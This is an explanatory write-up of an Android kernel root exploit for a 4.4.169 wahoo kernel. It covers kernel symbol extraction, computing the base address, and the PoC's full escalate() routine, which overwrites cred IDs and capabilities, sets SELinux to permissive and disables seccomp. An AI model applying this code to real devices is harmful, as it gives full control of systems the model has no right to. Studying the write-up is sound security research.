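Modifying data in kernel memory first requires the kernel base address and the kernel symbol information; the latter is used to compute offsets. The symbol information can be obtained by downloading the official image from googlesource and extracting it with a tool, or by dumping it from a rooted phone of the same model and kernel version. The approach used here is extraction from the official image.
Kernel symbol information
Following the method given in the poc3.c write-up, the symbols are obtained as follows.
Search Google for the test device's kernel version, which is `4.4.169-gee9976dde895` for this device. Find the wahoo-kernel repo in the results and download the file `Image.lz4-dtb` (use the txt download at the bottom right, base64-decode it to get the original file, and remember to fix the file extension).
Decompress the downloaded file: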

    $ lz4 -d Image.lz4-dtb Image
    Stream followed by unrecognized data
    Successfully decoded 37500928 bytes
    $ strings Image | grep "Linux version"
    Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019

Export the symbol table with droidimg. The following error may appear, which means the lookup of the kallsyms table failed:

    $ ./vmlinux.py Image
    Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
    [+]kallsyms_arch = arm64
    [!]could be offset table...
    [!]lookup_address_table error...
    [!]get kallsyms error...

Repair the Image with the tool shipped in droidimg:

    $ gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c
    fix_kaslr_arm64.c:269:5: warning: always_inline function might not be inlinable [-Wattributes]
     int main(int argc, char **argv)
         ^~~~
    $ ./fix_kaslr_arm64 Image Image_kaslr
    Original kernel: Image, output file: Image_kaslr
    kern_buf @ 0x7f7eb403c000, mmap_size = 37502976
    rela_start = 0xffffff8009916430
    p->info = 0x0
    rela_end = 0xffffff800a1b0340
    375847 entries processed

Finally, export the symbol table:

    $ ./vmlinux.py Image_kaslr > syms.txt
    Linux version 4.4.169-gee9976dde895 (android-build@abfarm325) (Android clang version 5.0.300080 (based on LLVM 5.0.300080)) #1 SMP PREEMPT Wed Mar 6 01:42:27 UTC 2019
    [+]kallsyms_arch = arm64
    [+]numsyms: 131300
    [+]kallsyms_address_table = 0x11eb300
    [+]kallsyms_num = 131300 (131300)
    [+]kallsyms_name_table = 0x12ebc00
    [+]kallsyms_type_table = 0x0
    [+]kallsyms_marker_table = 0x14a4a00
    [+]kallsyms_token_table = 0x14a5b00
    [+]kallsyms_token_index_table = 0x14a5f00
    [+]kallsyms_start_address = 0xffffff8008080000L
    [+]found 9917 symbols in ksymta

Offsets are computed from the addresses in the exported symbol table and the base address (`kallsyms_start_address = 0xffffff8008080000L`).
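Kernel base address
With the symbol offsets available, the base address is obtained by leaking the runtime address of some symbol and subtracting that symbol's offset from the symbol table.
`poc2.c` does this by reading the address in `task_struct->mm->user_ns` and subtracting the offset of `init_user_ns`.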
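The base computation is a pair of subtractions. Here is a minimal sketch, assuming the symbol table addresses are relative to the `kallsyms_start_address` shown above; the function names are illustrative and not taken from poc2.c.

```c
#include <assert.h>
#include <stdint.h>

/* Start address reported by the symbol dump in this write-up. */
#define KALLSYMS_START 0xffffff8008080000ULL

/* Offset of a symbol relative to the start of the dumped image. */
uint64_t symbol_offset(uint64_t table_addr)
{
    assert(table_addr >= KALLSYMS_START);
    return table_addr - KALLSYMS_START;
}

/* Runtime base = leaked runtime address of a symbol minus its offset. */
uint64_t kernel_base_from_leak(uint64_t leaked_addr, uint64_t table_addr)
{
    return leaked_addr - symbol_offset(table_addr);
}
```

As an example with made-up numbers: a symbol listed at 0xffffff8009234000 has offset 0x11b4000, so if its leaked runtime address were 0xffffff9a0a1b4000 the base would come out as 0xffffff9a09000000. Any other symbol's runtime address is then the base plus that symbol's offset.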
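Modifying attributes
The address of a system attribute is found as base address plus offset, and the value is then modified directly.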
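In poc3.c, the `escalate` function uses the kernel read/write primitive obtained earlier to escalate privileges. To get `full root`, that is, complete root privileges, several Linux security mechanisms have to be bypassed (only the types of mechanism are listed here, without a detailed explanation of each), but with kernel read/write this is not particularly hard. Part of the privilege-escalation code follows (`DEBUG_RW` in the original prints extra information to aid understanding):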

    void escalate()
    {
        ......
        uid_t uid = getuid();
        unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
        // offset 0x78 is pointer to void * security
        unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78);

        printf("current->cred == 0x%lx\n", my_cred);
        printf("Starting as uid %u\n", uid);
        printf("Escalating...\n");

        // change IDs to root (there are eight)
        for (int i = 0; i < 8; i++)
            kernel_write_uint(my_cred+4 + i*4, 0);

        if (getuid() != 0) {
            printf("Something went wrong changing our UID to root!\n");
            exit(1);
        }
        printf("UIDs changed to root!\n");

        // reset securebits
        kernel_write_uint(my_cred+0x24, 0);

        // change capabilities to everything (perm, effective, bounding)
        for (int i = 0; i < 3; i++)
            kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);
        printf("Capabilities set to ALL\n");

        // Grant: was checking for this earlier, but it's not set, so I moved on
        // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0));

        unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);
        printf("SELinux status = %u\n", enforcing);
        if (enforcing) {
            printf("Setting SELinux to permissive\n");
            kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
        } else {
            printf("SELinux is already in permissive mode\n");
        }

        // Grant: We want to be as powerful as init, which includes mounting in the global namespace
        printf("Re-joining the init mount namespace...\n");
        int fd = open("/proc/1/ns/mnt", O_RDONLY);
        if (fd < 0) {
            perror("open");
            exit(1);
        }
        if (setns(fd, CLONE_NEWNS) < 0) {
            perror("setns");
            exit(1);
        }

        printf("Re-joining the init net namespace...\n");
        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd < 0) {
            perror("open");
            exit(1);
        }
        if (setns(fd, CLONE_NEWNET) < 0) {
            perror("setns");
            exit(1);
        }

        // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
        if (prctl(PR_GET_SECCOMP) != 0) {
            printf("Disabling SECCOMP\n");
            // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN
            // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
            // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
            kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
            kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
            kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0);

            if (prctl(PR_GET_SECCOMP) != 0) {
                printf("Failed to disable SECCOMP!\n");
                exit(1);
            } else {
                printf("SECCOMP disabled!\n");
            }
        } else {
            printf("SECCOMP is already disabled!\n");
        }
        // Grant: At this point, we are free from our jail (if all went well)
    }

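Discretionary Access Control (DAC)
While obtaining kernel read/write we got a pointer to `task_struct`. `task_struct` is the struct the Linux kernel calls the process descriptor; it holds all kinds of information about a process. Its member `cred` is the struct related to the process's privileges, defined as follows: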

    struct cred {
        atomic_t usage;
    #ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t subscribers;   /* number of processes subscribed */
        void *put_addr;
        unsigned magic;
    #define CRED_MAGIC 0x43736564
    #define CRED_MAGIC_DEAD 0x44656144
    #endif
        kuid_t uid;     /* real UID of the task */
        kgid_t gid;     /* real GID of the task */
        kuid_t suid;    /* saved UID of the task */
        kgid_t sgid;    /* saved GID of the task */
        kuid_t euid;    /* effective UID of the task */
        kgid_t egid;    /* effective GID of the task */
        kuid_t fsuid;   /* UID for VFS ops */
        kgid_t fsgid;   /* GID for VFS ops */
        unsigned securebits;            /* SUID-less security management */
        kernel_cap_t cap_inheritable;   /* caps our children can inherit */
        kernel_cap_t cap_permitted;     /* caps we're permitted */
        kernel_cap_t cap_effective;     /* caps we can actually use */
        kernel_cap_t cap_bset;          /* capability bounding set */
        kernel_cap_t cap_ambient;       /* Ambient capability set */
    #ifdef CONFIG_KEYS
        unsigned char jit_keyring;          /* default keyring to attach requested
                                             * keys to */
        struct key __rcu *session_keyring;  /* keyring inherited over fork */
        struct key *process_keyring;        /* keyring private to this process */
        struct key *thread_keyring;         /* keyring private to this thread */
        struct key *request_key_auth;       /* assumed request_key authority */
    #endif
    #ifdef CONFIG_SECURITY
        void *security; /* subjective LSM security */
    #endif
        struct user_struct *user;       /* real user ID subscription */
        struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
        struct group_info *group_info;  /* supplementary groups for euid/fsgid */
        struct rcu_head rcu;            /* RCU deletion hook */
    } __randomize_layout;

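`escalate` first reads the `cred` pointer from `current_ptr` plus the offset of `cred` in `task_struct`, then sets the eight ID fields of that struct, from `uid` through `fsgid`, to 0, which makes the process root. Although the process is root at this point, other Linux security mechanisms still keep it from having full control of the system, so further values are modified afterwards.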
Linux Capabilities (CAP)
CAP corresponds to the members of type `kernel_cap_t` in `cred`.
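The hard-coded offsets in `escalate` (`my_cred+4`, `my_cred+0x24`, `my_cred+0x30`) can be checked against a user-space mirror of the start of `struct cred`. The sketch below assumes `CONFIG_DEBUG_CREDENTIALS` is disabled, that the ID types are 32 bits wide, and that `kernel_cap_t` is two 32-bit words; the `mirror_` types are stand-ins written for this example, not the kernel's definitions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed shape of kernel_cap_t: two 32-bit words. */
struct mirror_cap { uint32_t cap[2]; };

/* Userspace mirror of the leading members of struct cred, assuming
 * CONFIG_DEBUG_CREDENTIALS is off. Illustration only. */
struct mirror_cred {
    int32_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
    uint32_t securebits;
    struct mirror_cap cap_inheritable;
    struct mirror_cap cap_permitted;
    struct mirror_cap cap_effective;
    struct mirror_cap cap_bset;
    struct mirror_cap cap_ambient;
};

/* Offset of the i-th ID field (0 = uid ... 7 = fsgid). */
size_t cred_id_offset(int i)
{
    assert(i >= 0 && i < 8);
    return offsetof(struct mirror_cred, uid) + (size_t)i * sizeof(uint32_t);
}
```

Under these assumptions the eight IDs occupy offsets 0x4 through 0x20, `securebits` sits at 0x24, and the three 8-byte writes starting at 0x30 cover `cap_permitted`, `cap_effective` and `cap_bset`, which matches the loop bounds in `escalate`.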
Mandatory Access Control (MAC)
Here MAC refers to SELinux.
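The original author of poc3 first intended to modify the sid value in the `task_security_struct` that `void *security` in `cred` points to, moving the process from the shell level to a more privileged one, such as `sid=1`. However, the PoC hung at this point and could not continue, so the author switched to another method: patching the kernel to set the SELinux mode directly to `permissive`.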
The address is obtained from the offset of the symbol `selinux_enforcing`; writing 0 to that address switches SELinux to permissive.
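Secure computing mode (SECCOMP): restricts which system calls a process may make
SECCOMP has no effect on a PoC run from adb, but it blocks system calls made by a PoC bundled inside an app.
The following is found in the `task_struct` struct: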

    struct seccomp {
        int mode;
        struct seccomp_filter *filter;
    };

`mode` has two modes, `SECCOMP_MODE_STRICT` and `SECCOMP_MODE_FILTER`, and normally runs in filter mode. When mode is set to 0, seccomp is disabled.
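However, writing 0 to mode alone does not disable SECCOMP. While SECCOMP is active, the `TIF_SECCOMP` bit is set in `task_struct->thread_info.flags`. If the flag is left unchanged, the kernel still considers SECCOMP enabled and keeps calling `__secure_computing`, which, with mode equal to 0, falls through to `BUG()`, so the original system call is still not executed.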

    int __secure_computing(const struct seccomp_data *sd)
    {
        int mode = current->seccomp.mode;
        ......
        switch (mode) {
        case SECCOMP_MODE_STRICT:
            __secure_computing_strict(this_syscall); /* may call do_exit */
            return 0;
        case SECCOMP_MODE_FILTER:
            return __seccomp_filter(this_syscall, sd, false);
        default:
            BUG();
        }
    }

Therefore both mode and flags have to be overwritten.
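The PoC zeroes the whole flags word, and its comment suggests clearing only the single flag instead. A minimal sketch of that variant is shown below, using the bit number 11 quoted in the PoC comment; `clear_tif_seccomp` is a hypothetical helper that only computes the new value.

```c
#include <assert.h>

#define TIF_SECCOMP 11 /* bit number quoted in the escalate() comment */

/* Returns flags with only the TIF_SECCOMP bit cleared. */
unsigned long clear_tif_seccomp(unsigned long flags)
{
    unsigned long cleared = flags & ~(1UL << TIF_SECCOMP);

    assert((cleared & (1UL << TIF_SECCOMP)) == 0);
    return cleared;
}
```

In the exploit this would presumably be combined with the existing primitives: read the current word with `kernel_read_ulong`, pass it through the helper, and write the result back with `kernel_write_ulong`, leaving the other thread flags untouched.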
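At this point we have full root privileges.
I do not have much experience analysing vulnerabilities on my own. Because the exploitation of this one is not very complicated and it triggers almost reliably, I was able to follow the whole flow fairly completely. Finally, thanks to ghost for the guidance.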